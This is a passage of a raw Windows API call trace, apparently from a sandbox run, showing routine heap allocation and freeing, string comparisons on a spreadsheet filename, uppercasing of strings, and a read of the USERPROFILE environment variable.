hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0215.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0215.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0215.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0215.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0215.817] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0215.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a732c8 [0215.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iN034yd-ltTggQ-HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N034yd-ltTggQ-HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="034yd-ltTggQ-HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="34yd-ltTggQ-HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4yd-ltTggQ-HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yd-ltTggQ-HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d-ltTggQ-HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-ltTggQ-HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltTggQ-HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tTggQ-HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TggQ-HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ggQ-HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gQ-HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q-HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HcC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cC.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a736f0 [0215.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a736f0 | out: hHeap=0x2af0000) returned 1 [0215.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0215.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0215.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73178 | out: hHeap=0x2af0000) returned 1 [0215.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0215.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0215.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.819] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0215.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0215.819] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0215.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0215.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0215.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71af8 [0215.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0215.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0215.819] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0215.820] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab008 [0215.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0215.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0215.820] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0215.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0215.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0215.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0215.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0215.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0215.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854bf0 [0215.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0215.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0215.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0215.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0215.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0215.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0215.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0215.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0215.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0215.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.821] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0215.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.821] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0215.821] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf00 [0215.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0b0 [0215.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0215.822] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0215.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0215.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0215.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0215.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.822] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38540b0 [0215.822] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0215.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0215.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0215.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b88 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0215.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf00 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0215.823] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.823] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0215.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0215.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0215.824] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0215.824] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0215.824] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0215.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0215.825] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0215.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0215.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0215.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0215.825] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0215.825] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0215.825] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0215.828] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0215.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0215.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0215.829] HeapFree (in: 